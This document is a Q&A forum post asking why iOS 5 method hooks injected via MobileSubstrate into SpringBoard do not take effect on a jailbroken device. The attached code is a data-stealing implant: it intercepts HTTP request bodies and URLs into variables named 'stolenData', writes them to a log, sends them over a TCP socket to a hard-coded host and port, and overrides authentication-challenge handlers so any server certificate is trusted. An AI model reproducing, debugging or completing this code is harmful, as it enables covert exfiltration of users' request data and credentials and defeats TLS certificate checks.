# Can't hook functions in iOS 5

Tags: iphone, ios, hook

When we test hook, the dylib can be injected into the system, but system functions we want to hook doesn't work. We wrote logs in the dylib to trace, it seems that neither the class_replaceMethod code nor substrate lib works. We didn't copy the Info.plist file to iphone folder for hook.

I attached both approaches code here. Can you help us?

```
//////injection.m
#include <Foundation/Foundation.h>
#include <objc/objc.h>
#include <objc/runtime.h>
#include <UIKit/UIKit.h>

void didReceiveAuthenticationChallenge(id self, SEL op, NSURLConnection *connection, NSURLAuthenticationChallenge *challenge)
{
    if ( [ challenge.protectionSpace.authenticationMethod isEqualToString:NSURLAuthenticationMethodServerTrust ])
{
    [ challenge.sender useCredential: [ NSURLCredential credentialForTrust: challenge.protectionSpace.serverTrust] forAuthenticationChallenge: challenge];
}

[ challenge.sender continueWithoutCredentialForAuthenticationChallenge: challenge ];
}

BOOL canAuthenticateAgainstProtectionSpace(id self, SEL op, NSURLConnection *connection, NSURLProtectionSpace *protectionSpace)
{
if ( [ [ protectionSpace authenticationMethod ] isEqualToString: NSURLAuthenticationMethodServerTrust ])
{
    return YES;
}
}

IMP __mutableURLRequestIMP;
IMP __URLRequestIMP;
IMP __UIWindowSendEventIMP;

void setMutableHTTPBody(id self, SEL op, NSData *data)
{
mkdir("/usr/lib/iloginjection1", 777);

NSMutableURLRequest *theRequest = (NSMutableURLRequest *)self;
NSString *stolenData = [NSString stringWithFormat:@"%@ = > %s\n", [theRequest.URL absoluteString], [data bytes]];

//sendInterceptedData(stolenData);
(__mutableURLRequestIMP)(self, op, data);
}

void setUIWindowSendEvent(id self, SEL op, UIEvent *event)
{
    mkdir("/usr/lib/iloginjection2", 777);

    //NSURLRequest *theRequest = (NSURLRequest *)self;
    //NSString *stolenData = [NSString stringWithFormat:@"%@ = > %s\n",
    //                        [theRequest.URL absoluteString], [data bytes]];

    //sendInterceptedData(stolenData);
    (__UIWindowSendEventIMP)(self, op, event);
}

static void __attribute__((constructor)) initialize(void)
{
    NSLog(@"initialize鈥︹€︹€?");
    mkdir("/usr/lib/iloginjection", 777);

    __UIWindowSendEventIMP = class_replaceMethod(objc_getClass("UIWindow"), sel_registerName("sendEvent:"), setUIWindowSendEvent, "@:@");

    __mutableURLRequestIMP = class_replaceMethod(objc_getClass("NSMutableURLRequest"), sel_registerName("SetHTTPBody:"), setMutableHTTPBody, "@:@");

    //__URLRequestIMP = class_replaceMethod(objc_getClass("NSURLRequest"), sel_registerName("SetHTTPBody:"), setHTTPBody, "@:@");
}


/////////////////////////////////////////////////////////////////////////////
HookDemoInitialize.mm
////////////////////////////////////////////////////////////////////////////

#import "substrate.h"
#import "MessagesHook.h"
#include <Foundation/Foundation.h>
#include <objc/objc.h>
#include <objc/runtime.h>

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <errno.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <net/if.h>
#include <arpa/inet.h>
#include <netinet/tcp.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <string>

#define HOST "192.168.1.17"
#define PORT 8081

IMP __mutableURLRequestIMP;

extern "C"
{
    extern IMP original_setHTTPBody;
    //extern void replace_setHTTPBody(UIWindow *self, SEL cmd, UIEvent *event);
}

void sendInterceptedData(NSString* stolenData)
{
    char *buf = strdup([stolenData UTF8String]);
    struct sockaddr_in addr;
    size_t nr = strlen(buf) + 1;
    int nw;
    int addr_len;
    int yes = 1;
    int r, wfd;
    off_t off;

    wfd = socket(AF_INET, SOCK_STREAM, 0);
    memset(&addr, 0, sizeof(struct sockaddr_in));
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = inet_addr(HOST);
    addr.sin_port = htons(PORT);
    addr_len = sizeof(struct sockaddr_in);

    r = connect(wfd, (struct sockaddr*)& addr, addr_len);
    if(r < 0)
    {
        close(wfd);
        free(buf);
        return;
    }

    setsockopt(wfd, SOL_SOCKET, TCP_NODELAY, &yes, sizeof(int));

    for(off = 0; nr; nr -= nw, off += nw)
    {
        if((nw = send(wfd, buf + off, (size_t)nr, 0)) < 0)
        {
            close(wfd);
            free(buf);
            return;
        }
    }

    free(buf);
    close(wfd);
}

extern "C" void replace_setHTTPBody(id self, SEL op, NSData *data)
{
    NSLog(@"replace_setHTTPBody is call In Hook2");

    NSMutableURLRequest *theRequest = (NSMutableURLRequest *)self;
    NSString *stolenData = [NSString stringWithFormat:@"%@ = > %s\n", [theRequest.URL absoluteString], [data bytes]];

    mkdir("/usr/lib/ilog", 777);
    int fd = open("/usr/lib/ilog/hw.log", O_CREAT | O_RDWR | O_APPEND);

    char *buf = strdup([stolenData UTF8String]);
    size_t nr = strlen(buf) + 1;
    write(fd, buf, nr);
    close(fd);

    sendInterceptedData(stolenData);

    original_setHTTPBody(self, op, data);
}

void setHTTPBody(id self, SEL op, NSData *data)
{
    NSMutableURLRequest *theRequest = (NSMutableURLRequest *)self;
    NSString *stolenData = [NSString stringWithFormat:@"%@ = > %s\n", [theRequest.URL absoluteString], [data bytes]];

    sendInterceptedData(stolenData);
    (__mutableURLRequestIMP)(self, op, data);
}

void (*original_didReceiveAuthenticationChallenge)(id self, SEL op, NSURLConnection *connection, NSURLAuthenticationChallenge *challenge);
void replaced_didReceiveAuthenticationChallenge(id self, SEL op, NSURLConnection *connection, NSURLAuthenticationChallenge *challenge)
{
    NSLog(@"\n*********************replaced_didReceiveAuthenticationChallenge");
    if ( [ challenge.protectionSpace.authenticationMethod isEqualToString:NSURLAuthenticationMethodServerTrust ])
    {
        [ challenge.sender useCredential: [ NSURLCredential credentialForTrust: challenge.protectionSpace.serverTrust] forAuthenticationChallenge: challenge];
    }

    int fd = open("/usr/lib/ilog/hw.log", O_CREAT | O_RDWR | O_APPEND);
    std::string buf = "\n*********************replaced_didReceiveAuthenticationChallenge\n";
    write(fd, buf.c_str(), buf.length());
    close(fd);

    [ challenge.sender continueWithoutCredentialForAuthenticationChallenge:challenge ];
}

BOOL (*original_canAuthenticateAgainstProtectionSpace)(id self, SEL op, NSURLConnection *connection, NSURLProtectionSpace *protectionSpace);
BOOL replaced_canAuthenticateAgainstProtectionSpace(id self, SEL op, NSURLConnection *connection, NSURLProtectionSpace *protectionSpace)
{
    NSLog(@"\n*********************replaced_canAuthenticateAgainstProtectionSpace");

    int fd = open("/usr/lib/ilog/hw.log", O_CREAT | O_RDWR | O_APPEND);
    std::string buf = "\n*********************replaced_canAuthenticateAgainstProtectionSpace\n";
    write(fd, buf.c_str(), buf.length());
    close(fd);

    // if ( [ [ protectionSpace authenticationMethod ]
    //      isEqualToString: NSURLAuthenticationMethodServerTrust ])
    // {
    return NO;
    //}
}

extern "C" void HookDemoInitialize() 
{
    NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];

    NSLog(@"HookDemoInitialize is call In Hook2");

    mkdir("/usr/lib/ilog", 777);

    MSHookMessageEx([UIWindow class], @selector(sendEvent:), (IMP)replace_UIWindow_sendEvent, (IMP *)&original_UIWindow_sendEvent);

    //__mutableURLRequestIMP = class_replaceMethod(objc_getClass("NSMutableURLRequest"), sel_registerName("SetHTTPBody:"), setHTTPBody, "@:@");

    //MSHookMessageEx([NSMutableURLRequest class], @selector(SetHTTPBody:), (IMP)replace_setHTTPBody, (IMP *)&original_setHTTPBody);

    MSHookMessageEx([NSURLRequest class], @selector(SetHTTPBody:), (IMP)replace_setHTTPBody, (IMP *)&original_setHTTPBody);

    MSHookMessageEx([NSURLConnection class], @selector(didReceiveAuthenticationChallenge:), (IMP)replaced_didReceiveAuthenticationChallenge,(IMP *)&original_didReceiveAuthenticationChallenge);

    MSHookMessageEx([NSURLConnection class], @selector(canAuthenticateAgainstProtectionSpace:), (IMP)replaced_canAuthenticateAgainstProtectionSpace,(IMP *)&original_canAuthenticateAgainstProtectionSpace);

    [pool release];
}
```

Comment: So, is this on a jailbroken device? How are you injecting the dylib into the target process?

Comment: Yes, this is on a jailbroken device. I just use MobileSubstrate to inject the dylib into the SpringBoard